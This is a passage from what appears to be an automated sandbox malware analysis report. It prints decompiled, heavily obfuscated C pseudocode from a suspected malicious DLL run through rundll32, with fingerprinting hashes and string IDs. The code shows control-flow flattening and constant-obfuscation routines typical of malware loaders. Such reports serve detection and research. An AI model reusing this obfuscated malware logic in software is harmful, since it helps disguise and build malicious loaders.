                                                                                                                      							_t310 = E0068A8B0(_v120, _t307, _v32);
                                                                                                                      							_t319 = 0xb066d4a;
                                                                                                                      							while(1) {
                                                                                                                      								L1:
                                                                                                                      								_t353 = 0x2e;
                                                                                                                      								goto L2;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						if(_t319 == 0xb066d4a) {
                                                                                                                      							_t310 = E00687E00(_v108,  &_v756, _v76, _v48,  &_v1796);
                                                                                                                      							_t364 = _t310;
                                                                                                                      							_t374 = _t374 + 0xc;
                                                                                                                      							__eflags = _t310 - 0xffffffff;
                                                                                                                      							if(__eflags == 0) {
                                                                                                                      								L25:
                                                                                                                      								return _t310;
                                                                                                                      							}
                                                                                                                      							_t319 = 0x5b964d8;
                                                                                                                      							goto L1;
                                                                                                                      						}
                                                                                                                      						if(_t319 != 0xbd9f62d) {
                                                                                                                      							L24:
                                                                                                                      							__eflags = _t319 - 0xa89df2;
                                                                                                                      							if(__eflags != 0) {
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      							goto L25;
                                                                                                                      						}
                                                                                                                      						_t310 = E00684635(_v16,  &_v756, _t364, _v24);
                                                                                                                      						asm("sbb ecx, ecx");
                                                                                                                      						_t324 =  ~_t310 & 0x03a73aff;
                                                                                                                      						goto L9;
                                                                                                                      					}
                                                                                                                      					E00688ABF(_t364, _v72, _v68);
                                                                                                                      					_t319 = 0xa89df2;
                                                                                                                      					_t353 = 0x2e;
                                                                                                                      					goto L24;
                                                                                                                      				}
                                                                                                                      			}

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: H&!$Up7$yBd&
                                                                                                                      • API String ID: 0-2352930472
                                                                                                                      • Opcode ID: 917ca898db0dc3a660e8521bdac44c3383e7313a456cafe04c1ba179e828769d
                                                                                                                      • Instruction ID: 6433a80366259b7d065113bd49eeb5b8695b5f83d24a86447e8844a260814514
                                                                                                                      • Opcode Fuzzy Hash: 917ca898db0dc3a660e8521bdac44c3383e7313a456cafe04c1ba179e828769d
                                                                                                                      • Instruction Fuzzy Hash: 38E16471D0021DDBDF28DFE4D98A9EEBBB2FB44314F20825AE515BA264D7B40A45CF41
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E006995FA() {
                                                                                                                      				char _v524;
                                                                                                                      				signed int _v532;
                                                                                                                      				intOrPtr _v536;
                                                                                                                      				intOrPtr _v540;
                                                                                                                      				intOrPtr _v544;
                                                                                                                      				intOrPtr _v548;
                                                                                                                      				intOrPtr _v552;
                                                                                                                      				intOrPtr _v556;
                                                                                                                      				intOrPtr _v560;
                                                                                                                      				char _v564;
                                                                                                                      				intOrPtr _v568;
                                                                                                                      				char _v572;
                                                                                                                      				signed int _v576;
                                                                                                                      				signed int _v580;
                                                                                                                      				signed int _v584;
                                                                                                                      				signed int _v588;
                                                                                                                      				signed int _v592;
                                                                                                                      				signed int _v596;
                                                                                                                      				signed int _v600;
                                                                                                                      				signed int _v604;
                                                                                                                      				signed int _v608;
                                                                                                                      				signed int _v612;
                                                                                                                      				signed int _v616;
                                                                                                                      				signed int _v620;
                                                                                                                      				signed int _v624;
                                                                                                                      				signed int _v628;
                                                                                                                      				signed int _v632;
                                                                                                                      				signed int _v636;
                                                                                                                      				signed int _v640;
                                                                                                                      				signed int _v644;
                                                                                                                      				signed int _v648;
                                                                                                                      				signed int _v652;
                                                                                                                      				signed int _v656;
                                                                                                                      				signed int _v660;
                                                                                                                      				signed int _v664;
                                                                                                                      				signed int _v668;
                                                                                                                      				signed int _v672;
                                                                                                                      				signed int _v676;
                                                                                                                      				signed int _v680;
                                                                                                                      				signed int _v684;
                                                                                                                      				signed int _v688;
                                                                                                                      				intOrPtr _t295;
                                                                                                                      				void* _t297;
                                                                                                                      				void* _t298;
                                                                                                                      				intOrPtr _t299;
                                                                                                                      				signed int _t306;
                                                                                                                      				void* _t309;
                                                                                                                      				void* _t310;
                                                                                                                      				char _t311;
                                                                                                                      				void* _t317;
                                                                                                                      				intOrPtr _t334;
                                                                                                                      				signed int _t341;
                                                                                                                      				signed int _t342;
                                                                                                                      				signed int _t343;
                                                                                                                      				signed int _t344;
                                                                                                                      				void* _t347;
                                                                                                                      
                                                                                                                      				_v668 = 0xe6fb93;
                                                                                                                      				_v668 = _v668 + 0xffff1eed;
                                                                                                                      				_t310 = 0xada6804;
                                                                                                                      				_v668 = _v668 * 0x61;
                                                                                                                      				_t309 = 0;
                                                                                                                      				_v668 = _v668 ^ 0xaca28cc6;
                                                                                                                      				_v668 = _v668 ^ 0xfb928647;
                                                                                                                      				_v616 = 0x8caf33;
                                                                                                                      				_t341 = 0x42;
                                                                                                                      				_v616 = _v616 * 0x25;
                                                                                                                      				_v616 = _v616 * 0x4f;
                                                                                                                      				_v616 = _v616 ^ 0x46546a51;
                                                                                                                      				_v620 = 0x861136;
                                                                                                                      				_v620 = _v620 | 0x52f06d4d;
                                                                                                                      				_v620 = _v620 >> 0xf;
                                                                                                                      				_v620 = _v620 ^ 0x0000a5ef;
                                                                                                                      				_v628 = 0x4cf396;
                                                                                                                      				_v628 = _v628 >> 1;
                                                                                                                      				_v628 = _v628 >> 9;
                                                                                                                      				_v628 = _v628 ^ 0x0000133c;
                                                                                                                      				_v684 = 0xc54e58;
                                                                                                                      				_v684 = _v684 >> 2;
                                                                                                                      				_v684 = _v684 ^ 0xb8bf25ee;
                                                                                                                      				_v684 = _v684 >> 2;
                                                                                                                      				_v684 = _v684 ^ 0x2e259ad3;
                                                                                                                      				_v592 = 0x68267f;
                                                                                                                      				_v592 = _v592 + 0xffff39c4;
                                                                                                                      				_v592 = _v592 ^ 0x006c60f9;
                                                                                                                      				_v632 = 0xa1d089;
                                                                                                                      				_v632 = _v632 / _t341;
                                                                                                                      				_v632 = _v632 ^ 0x52222b14;
                                                                                                                      				_v632 = _v632 ^ 0x5220bcfc;
                                                                                                                      				_v608 = 0x39d352;
                                                                                                                      				_v608 = _v608 | 0x2e7e1ae1;
                                                                                                                      				_v608 = _v608 ^ 0x576cc274;
                                                                                                                      				_v608 = _v608 ^ 0x7911cf35;
                                                                                                                      				_v660 = 0xc26f36;
                                                                                                                      				_v660 = _v660 ^ 0x9f5dc88a;
                                                                                                                      				_v660 = _v660 ^ 0xeefda613;
                                                                                                                      				_t342 = 0x3f;
                                                                                                                      				_v660 = _v660 / _t342;
                                                                                                                      				_v660 = _v660 ^ 0x01ce77bb;
                                                                                                                      				_v624 = 0x334861;
                                                                                                                      				_v624 = _v624 + 0xffff4b1a;
                                                                                                                      				_t343 = 0x2a;
                                                                                                                      				_v624 = _v624 * 0x2f;
                                                                                                                      				_v624 = _v624 ^ 0x0947e580;
                                                                                                                      				_v652 = 0xab72b9;
                                                                                                                      				_v652 = _v652 << 8;
                                                                                                                      				_v652 = _v652 / _t343;
                                                                                                                      				_v652 = _v652 ^ 0x0419701b;
                                                                                                                      				_v688 = 0x507748;
                                                                                                                      				_v688 = _v688 << 5;
                                                                                                                      				_v688 = _v688 + 0xffff449a;
                                                                                                                      				_v688 = _v688 + 0xb858;
                                                                                                                      				_v688 = _v688 ^ 0x0a0a66f0;
                                                                                                                      				_v600 = 0x95cabc;
                                                                                                                      				_v600 = _v600 + 0xffffb185;
                                                                                                                      				_v600 = _v600 << 9;
                                                                                                                      				_v600 = _v600 ^ 0x2af43595;
                                                                                                                      				_v580 = 0x7e3ec7;
                                                                                                                      				_v580 = _v580 ^ 0x09caac24;
                                                                                                                      				_v580 = _v580 ^ 0x09b70662;
                                                                                                                      				_v612 = 0xa526a8;
                                                                                                                      				_v612 = _v612 | 0x64dab874;
                                                                                                                      				_v612 = _v612 >> 0xe;
                                                                                                                      				_v612 = _v612 ^ 0x0006f9eb;
                                                                                                                      				_v604 = 0xb7de18;
                                                                                                                      				_t344 = 0x48;
                                                                                                                      				_v604 = _v604 * 0x79;
                                                                                                                      				_v604 = _v604 * 0x31;
                                                                                                                      				_v604 = _v604 ^ 0xa26ee4e9;
                                                                                                                      				_v640 = 0x553c00;
                                                                                                                      				_v640 = _v640 + 0xffff4196;
                                                                                                                      				_v640 = _v640 + 0xffff8daf;
                                                                                                                      				_v640 = _v640 ^ 0x00577a07;
                                                                                                                      				_v576 = 0xaac37;
                                                                                                                      				_v576 = _v576 * 0x77;
                                                                                                                      				_v576 = _v576 ^ 0x04fc3a71;
                                                                                                                      				_v676 = 0xb6ce7b;
                                                                                                                      				_v676 = _v676 >> 1;
                                                                                                                      				_v676 = _v676 * 0x28;
                                                                                                                      				_v676 = _v676 >> 0xb;
                                                                                                                      				_v676 = _v676 ^ 0x000b20b4;
                                                                                                                      				_v584 = 0x4877b4;
                                                                                                                      				_v584 = _v584 << 1;
                                                                                                                      				_v584 = _v584 ^ 0x009148e9;
                                                                                                                      				_v588 = 0xaf1c90;
                                                                                                                      				_v588 = _v588 * 0x5b;
                                                                                                                      				_v588 = _v588 ^ 0x3e3937c6;
                                                                                                                      				_v644 = 0x150bb3;
                                                                                                                      				_v644 = _v644 + 0x865c;
                                                                                                                      				_v644 = _v644 + 0x5404;
                                                                                                                      				_v644 = _v644 ^ 0x001dce65;
                                                                                                                      				_v648 = 0xaa3958;
                                                                                                                      				_v648 = _v648 / _t344;
                                                                                                                      				_v648 = _v648 >> 0xe;
                                                                                                                      				_v648 = _v648 ^ 0x000a9525;
                                                                                                                      				_v596 = 0xdb2add;
                                                                                                                      				_v596 = _v596 << 0xd;
                                                                                                                      				_v596 = _v596 ^ 0x65528fd4;
                                                                                                                      				_v680 = 0xd04d0c;
                                                                                                                      				_v680 = _v680 << 5;
                                                                                                                      				_t340 = _v596;
                                                                                                                      				_v680 = _v680 * 0x55;
                                                                                                                      				_v680 = _v680 | 0x96843ebb;
                                                                                                                      				_v680 = _v680 ^ 0xb7be4a39;
                                                                                                                      				_v656 = 0x2591b4;
                                                                                                                      				_v656 = _v656 ^ 0x7517a4f1;
                                                                                                                      				_v656 = _v656 ^ 0xb20365ef;
                                                                                                                      				_v656 = _v656 + 0xffff4c4f;
                                                                                                                      				_v656 = _v656 ^ 0xc733773b;
                                                                                                                      				_v636 = 0xbfc674;
                                                                                                                      				_v636 = _v636 * 0x1d;
                                                                                                                      				_v636 = _v636 << 6;
                                                                                                                      				_v636 = _v636 ^ 0x6e5b8cbc;
                                                                                                                      				_v664 = 0x3235cc;
                                                                                                                      				_v664 = _v664 << 1;
                                                                                                                      				_v664 = _v664 | 0x857b9d7f;
                                                                                                                      				_v664 = _v664 * 0x28;
                                                                                                                      				_v664 = _v664 ^ 0xdbf98c50;
                                                                                                                      				_v672 = 0xb181ad;
                                                                                                                      				_v672 = _v672 >> 0xa;
                                                                                                                      				_v672 = _v672 << 2;
                                                                                                                      				_v672 = _v672 ^ 0xdb7e6d02;
                                                                                                                      				_v672 = _v672 ^ 0xdb78e9e9;
                                                                                                                      				do {
                                                                                                                      					while(_t310 != 0x10c1a7f) {
                                                                                                                      						if(_t310 == 0x31db0c0) {
                                                                                                                      							_t311 = _v572;
                                                                                                                      							_t295 = _v568;
                                                                                                                      							_push(_t311);
                                                                                                                      							_v560 = _t295;
                                                                                                                      							_v552 = _t295;
                                                                                                                      							_v544 = _t295;
                                                                                                                      							_v536 = _t295;
                                                                                                                      							_v564 = _t311;
                                                                                                                      							_v556 = _t311;
                                                                                                                      							_v548 = _t311;
                                                                                                                      							_v540 = _t311;
                                                                                                                      							_v532 = _v628;
                                                                                                                      							_t297 = E00685DDD( &_v564, _t340, _v644, _v648, _t311, _v596, _v680);
                                                                                                                      							_t347 = _t347 + 0x18;
                                                                                                                      							__eflags = _t297;
                                                                                                                      							_t309 = (_t297 != 0) ? 1 : _t309;
                                                                                                                      							_t310 = 0x48f7cbb;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t310 == 0x461819e) {
                                                                                                                      								_push(_v660);
                                                                                                                      								_push(_v608);
                                                                                                                      								_t298 = E0069DCF7(_v632, 0x681000, __eflags);
                                                                                                                      								_pop(_t317);
                                                                                                                      								_t299 =  *0x6a3e10; // 0x0
                                                                                                                      								_t334 =  *0x6a3e10; // 0x0
                                                                                                                      								E006847CE(_t334 + 0x23c, _v624, _t317, _v652, _v688, _t298, _t299 + 0x1c, _v600, _v580);
                                                                                                                      								E0068A8B0(_v612, _t298, _v604);
                                                                                                                      								_t347 = _t347 + 0x24;
                                                                                                                      								_t310 = 0xa22489e;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t310 == 0x48f7cbb) {
                                                                                                                      									E00691E67(_v656, _v636, _v664, _v672, _t340);
                                                                                                                      								} else {
                                                                                                                      									if(_t310 == 0xa22489e) {
                                                                                                                      										_t306 = E00688F65(_v640, _v576,  &_v524, _v676, 0, _t310, _v616, _v584, _v620, _v588, _t310, _v668);
                                                                                                                      										_t340 = _t306;
                                                                                                                      										_t347 = _t347 + 0x28;
                                                                                                                      										__eflags = _t306 - 0xffffffff;
                                                                                                                      										if(__eflags != 0) {
                                                                                                                      											_t310 = 0x31db0c0;
                                                                                                                      											continue;
                                                                                                                      										}
                                                                                                                      									} else {
                                                                                                                      										if(_t310 == 0xada6804) {
                                                                                                                      											_t310 = 0xcbcd90e;
                                                                                                                      											continue;
                                                                                                                      										} else {
                                                                                                                      											if(_t310 != 0xcbcd90e) {
                                                                                                                      												goto L15;
                                                                                                                      											} else {
                                                                                                                      												E0069C1EC(_v684, _v592,  &_v572);
                                                                                                                      												_t310 = 0x10c1a7f;
                                                                                                                      												continue;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L18:
                                                                                                                      						return _t309;
                                                                                                                      					}
                                                                                                                      					_v572 = _v572 - E0069ABD1();
                                                                                                                      					_t310 = 0x461819e;
                                                                                                                      					asm("sbb [esp+0x8c], edx");
                                                                                                                      					L15:
                                                                                                                      					__eflags = _t310 - 0x7e6efe8;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				goto L18;
                                                                                                                      			}




























































                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HwP$QjTF$aH3
                                                                                                                      • API String ID: 0-3950587752
                                                                                                                      • Opcode ID: f97cdecf444d9df432f4dda8753d838e031a9ba13fc95eafda0c63998ae279b8
                                                                                                                      • Instruction ID: 169da52420fa322962e7eba8e5fef382dc3254eb67a3a82463e4f89ed4dd8818
                                                                                                                      • Opcode Fuzzy Hash: f97cdecf444d9df432f4dda8753d838e031a9ba13fc95eafda0c63998ae279b8
                                                                                                                      • Instruction Fuzzy Hash: 96E12E714093819FD768CF25C58A65BBBE2FBC4748F208A1DF29A86260D7B58949CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E0068B2C7(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                      				char _v40;
                                                                                                                      				char _v48;
                                                                                                                      				intOrPtr _v72;
                                                                                                                      				intOrPtr _v80;
                                                                                                                      				intOrPtr _v84;
                                                                                                                      				intOrPtr _v92;
                                                                                                                      				char _v108;
                                                                                                                      				char _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				void* _t137;
                                                                                                                      				intOrPtr* _t157;
                                                                                                                      				signed int _t166;
                                                                                                                      				void* _t173;
                                                                                                                      				intOrPtr _t191;
                                                                                                                      				void* _t203;
                                                                                                                      				void* _t208;
                                                                                                                      				signed int _t209;
                                                                                                                      				signed int _t210;
                                                                                                                      				signed int _t211;
                                                                                                                      				signed int _t212;
                                                                                                                      				intOrPtr* _t213;
                                                                                                                      				void* _t215;
                                                                                                                      				void* _t216;
                                                                                                                      				void* _t218;
                                                                                                                      
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E006920B9(_t137);
                                                                                                                      				_v136 = 0x2c5bc;
                                                                                                                      				_t216 = _t215 + 0xc;
                                                                                                                      				_t208 = 0;
                                                                                                                      				_t173 = 0xf62a13b;
                                                                                                                      				_t209 = 0x63;
                                                                                                                      				_v136 = _v136 / _t209;
                                                                                                                      				_v136 = _v136 + 0xe356;
                                                                                                                      				_v136 = _v136 ^ 0x000982ba;
                                                                                                                      				_v156 = 0x35028b;
                                                                                                                      				_v156 = _v156 | 0x143a760d;
                                                                                                                      				_v156 = _v156 + 0xfffff236;
                                                                                                                      				_v156 = _v156 ^ 0x8a3e1055;
                                                                                                                      				_v156 = _v156 ^ 0x9e033c32;
                                                                                                                      				_v128 = 0xf43d73;
                                                                                                                      				_v128 = _v128 | 0xd1983256;
                                                                                                                      				_v128 = _v128 ^ 0xd1f71de4;
                                                                                                                      				_v120 = 0x9951cf;
                                                                                                                      				_v120 = _v120 + 0xffffd11b;
                                                                                                                      				_v120 = _v120 ^ 0x00948e71;
                                                                                                                      				_v152 = 0x57fc5b;
                                                                                                                      				_v152 = _v152 | 0x88a856bb;
                                                                                                                      				_v152 = _v152 << 9;
                                                                                                                      				_v152 = _v152 + 0xa27f;
                                                                                                                      				_v152 = _v152 ^ 0xfff91174;
                                                                                                                      				_v116 = 0x3d6e6b;
                                                                                                                      				_t210 = 9;
                                                                                                                      				_v116 = _v116 / _t210;
                                                                                                                      				_v116 = _v116 ^ 0x0006b75d;
                                                                                                                      				_v140 = 0x916f20;
                                                                                                                      				_t211 = 0x35;
                                                                                                                      				_v140 = _v140 * 0x22;
                                                                                                                      				_v140 = _v140 / _t211;
                                                                                                                      				_t212 = 0x7b;
                                                                                                                      				_v140 = _v140 * 0x1d;
                                                                                                                      				_v140 = _v140 ^ 0x0a9423e2;
                                                                                                                      				_v148 = 0x96f30f;
                                                                                                                      				_v148 = _v148 ^ 0x6547be83;
                                                                                                                      				_v148 = _v148 << 9;
                                                                                                                      				_v148 = _v148 | 0xa101889a;
                                                                                                                      				_v148 = _v148 ^ 0xa391ec3d;
                                                                                                                      				_v124 = 0x9e8998;
                                                                                                                      				_v124 = _v124 | 0x73c531f9;
                                                                                                                      				_v124 = _v124 ^ 0x73d6e9c9;
                                                                                                                      				_v132 = 0xda1f74;
                                                                                                                      				_v132 = _v132 + 0x97a0;
                                                                                                                      				_v132 = _v132 ^ 0xdacfb227;
                                                                                                                      				_v132 = _v132 ^ 0xda161b2e;
                                                                                                                      				_v144 = 0x87027b;
                                                                                                                      				_t213 = _v128;
                                                                                                                      				_v144 = _v144 / _t212;
                                                                                                                      				_v144 = _v144 + 0x3568;
                                                                                                                      				_v144 = _v144 | 0x38a39b99;
                                                                                                                      				_v144 = _v144 ^ 0x38a88a96;
                                                                                                                      				while(1) {
                                                                                                                      					_t218 = _t173 - 0x628c872;
                                                                                                                      					if(_t218 > 0) {
                                                                                                                      						goto L25;
                                                                                                                      					}
                                                                                                                      					L2:
                                                                                                                      					if(_t218 == 0) {
                                                                                                                      						_push(_t173);
                                                                                                                      						_push(_t173);
                                                                                                                      						_t203 = 0x50;
                                                                                                                      						_t213 = E00687FF2(_t203);
                                                                                                                      						__eflags = _t213;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							L16:
                                                                                                                      							_t173 = 0xe7b6043;
                                                                                                                      							continue;
                                                                                                                      							do {
                                                                                                                      								while(1) {
                                                                                                                      									_t218 = _t173 - 0x628c872;
                                                                                                                      									if(_t218 > 0) {
                                                                                                                      										goto L25;
                                                                                                                      									}
                                                                                                                      									goto L2;
                                                                                                                      								}
                                                                                                                      								goto L25;
                                                                                                                      								L45:
                                                                                                                      								__eflags = _t173 - 0xee0c843;
                                                                                                                      							} while (__eflags != 0);
                                                                                                                      							L46:
                                                                                                                      							return _t208;
                                                                                                                      						}
                                                                                                                      						_t173 = 0xf1dea2;
                                                                                                                      						 *((intOrPtr*)(_t213 + 0x24)) = _v92;
                                                                                                                      						 *((intOrPtr*)(_t213 + 0x3c)) = _v80;
                                                                                                                      						 *((intOrPtr*)(_t213 + 0x20)) = _v72;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					if(_t173 == 0xf1dea2) {
                                                                                                                      						__eflags = _v84 - 1;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							E00694B87( &_v108);
                                                                                                                      							L13:
                                                                                                                      							_t173 = 0x4d68783;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						_t173 = 0x9ca47b0;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					if(_t173 == 0x1c23c86) {
                                                                                                                      						__eflags = _v84 - 4;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							E00696DF8( &_v108);
                                                                                                                      							goto L13;
                                                                                                                      						}
                                                                                                                      						_t173 = 0x6a06f56;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					if(_t173 == 0x45d7e1c) {
                                                                                                                      						_t157 = E0069D97D( &_v40, _v120, __eflags, _v152,  &_v48, _v116);
                                                                                                                      						_t216 = _t216 + 0xc;
                                                                                                                      						__eflags = _t157;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							goto L46;
                                                                                                                      						}
                                                                                                                      						goto L16;
                                                                                                                      					}
                                                                                                                      					if(_t173 == 0x483085d) {
                                                                                                                      						__eflags = _v84 - 7;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							E00690E53( &_v108);
                                                                                                                      						}
                                                                                                                      						goto L13;
                                                                                                                      					}
                                                                                                                      					if(_t173 == 0x4d68783) {
                                                                                                                      						_t191 =  *0x6a3208; // 0x0
                                                                                                                      						_t208 = _t208 + 1;
                                                                                                                      						 *_t213 =  *((intOrPtr*)(_t191 + 0x20c));
                                                                                                                      						 *((intOrPtr*)(_t191 + 0x20c)) = _t213;
                                                                                                                      						L10:
                                                                                                                      						_t173 = 0x45d7e1c;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					if(_t173 != 0x4fb7fc6) {
                                                                                                                      						goto L45;
                                                                                                                      					}
                                                                                                                      					E00690B19(0);
                                                                                                                      					goto L10;
                                                                                                                      					L25:
                                                                                                                      					__eflags = _t173 - 0x6a06f56;
                                                                                                                      					if(_t173 == 0x6a06f56) {
                                                                                                                      						__eflags = _v84 - 5;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							E0068B74D( &_v108, _t213);
                                                                                                                      							_t173 = 0x4d68783;
                                                                                                                      							goto L45;
                                                                                                                      						}
                                                                                                                      						_t173 = 0xcf2e7b4;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					__eflags = _t173 - 0x9a20357;
                                                                                                                      					if(_t173 == 0x9a20357) {
                                                                                                                      						__eflags = _v84 - 3;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							E00691889( &_v108);
                                                                                                                      							goto L13;
                                                                                                                      						}
                                                                                                                      						_t173 = 0x1c23c86;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					__eflags = _t173 - 0x9ca47b0;
                                                                                                                      					if(_t173 == 0x9ca47b0) {
                                                                                                                      						__eflags = _v84 - 2;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							E00689714( &_v108, _t213);
                                                                                                                      							goto L13;
                                                                                                                      						}
                                                                                                                      						_t173 = 0x9a20357;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					__eflags = _t173 - 0xcf2e7b4;
                                                                                                                      					if(_t173 == 0xcf2e7b4) {
                                                                                                                      						__eflags = _v84 - 6;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							E0068F09B( &_v108);
                                                                                                                      							goto L13;
                                                                                                                      						}
                                                                                                                      						_t173 = 0x483085d;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					__eflags = _t173 - 0xe7b6043;
                                                                                                                      					if(_t173 == 0xe7b6043) {
                                                                                                                      						_t166 = E0068E5CF( &_v48, _v140,  &_v112, _v148);
                                                                                                                      						asm("sbb ecx, ecx");
                                                                                                                      						_t173 = ( ~_t166 & 0x01cb4a56) + 0x45d7e1c;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					__eflags = _t173 - 0xf62a13b;
                                                                                                                      					if(_t173 != 0xf62a13b) {
                                                                                                                      						goto L45;
                                                                                                                      					}
                                                                                                                      					E00683DBC( &_v40, _a4, _v136, _v156, _v128);
                                                                                                                      					_t216 = _t216 + 0xc;
                                                                                                                      					_t173 = 0x4fb7fc6;
                                                                                                                      				}
                                                                                                                      			}






































                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: V$h5$kn=
                                                                                                                      • API String ID: 0-2568719763
                                                                                                                      • Opcode ID: 2c8b7708cb4350419a04d8b387a528fad8e3beaa82f0e97e7a8b071f16a0082b
                                                                                                                      • Instruction ID: 71dbe5dc1f8da772abf16aa95c68ee37c6e75957f1e57e9c0d6fb369f7f510e1
                                                                                                                      • Opcode Fuzzy Hash: 2c8b7708cb4350419a04d8b387a528fad8e3beaa82f0e97e7a8b071f16a0082b
                                                                                                                      • Instruction Fuzzy Hash: C0A19870108340CBC768EF25D49656FBBF2FB84308F246A2EF19686261D7759A4ACF47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E00694116() {
                                                                                                                      				char _v524;
                                                                                                                      				intOrPtr _v548;
                                                                                                                      				char _v564;
                                                                                                                      				intOrPtr _v568;
                                                                                                                      				char _v572;
                                                                                                                      				signed int _v576;
                                                                                                                      				signed int _v580;
                                                                                                                      				signed int _v584;
                                                                                                                      				signed int _v588;
                                                                                                                      				signed int _v592;
                                                                                                                      				signed int _v596;
                                                                                                                      				signed int _v600;
                                                                                                                      				signed int _v604;
                                                                                                                      				signed int _v608;
                                                                                                                      				signed int _v612;
                                                                                                                      				signed int _v616;
                                                                                                                      				signed int _v620;
                                                                                                                      				signed int _v624;
                                                                                                                      				signed int _v628;
                                                                                                                      				signed int _v632;
                                                                                                                      				signed int _v636;
                                                                                                                      				signed int _v640;
                                                                                                                      				signed int _v644;
                                                                                                                      				signed int _v648;
                                                                                                                      				signed int _v652;
                                                                                                                      				signed int _v656;
                                                                                                                      				signed int _t220;
                                                                                                                      				signed int _t222;
                                                                                                                      				void* _t224;
                                                                                                                      				void* _t226;
                                                                                                                      				void* _t227;
                                                                                                                      				signed int _t229;
                                                                                                                      				signed int _t230;
                                                                                                                      				signed int _t231;
                                                                                                                      				signed int _t232;
                                                                                                                      				signed int _t233;
                                                                                                                      				signed int _t250;
                                                                                                                      				void* _t253;
                                                                                                                      				void* _t258;
                                                                                                                      				void* _t260;
                                                                                                                      
                                                                                                                      				_v604 = 0x9b146b;
                                                                                                                      				_v604 = _v604 | 0x658b3ccc;
                                                                                                                      				_v604 = _v604 + 0xfffff1f3;
                                                                                                                      				_v604 = _v604 ^ 0x659b2e62;
                                                                                                                      				_v596 = 0xb07d39;
                                                                                                                      				_v596 = _v596 | 0x89b98cff;
                                                                                                                      				_v596 = _v596 ^ 0x89b9fdfe;
                                                                                                                      				_v584 = 0x342693;
                                                                                                                      				_v584 = _v584 ^ 0x5537c6ac;
                                                                                                                      				_v584 = _v584 ^ 0x5503e03c;
                                                                                                                      				_v628 = 0x844a73;
                                                                                                                      				_v628 = _v628 | 0x8aea995b;
                                                                                                                      				_v628 = _v628 >> 3;
                                                                                                                      				_v628 = _v628 ^ 0x3316179a;
                                                                                                                      				_v628 = _v628 ^ 0x224eeca0;
                                                                                                                      				_v644 = 0xac1c02;
                                                                                                                      				_v644 = _v644 * 0x6d;
                                                                                                                      				_t227 = 0;
                                                                                                                      				_v644 = _v644 << 0xf;
                                                                                                                      				_t253 = 0x9728f62;
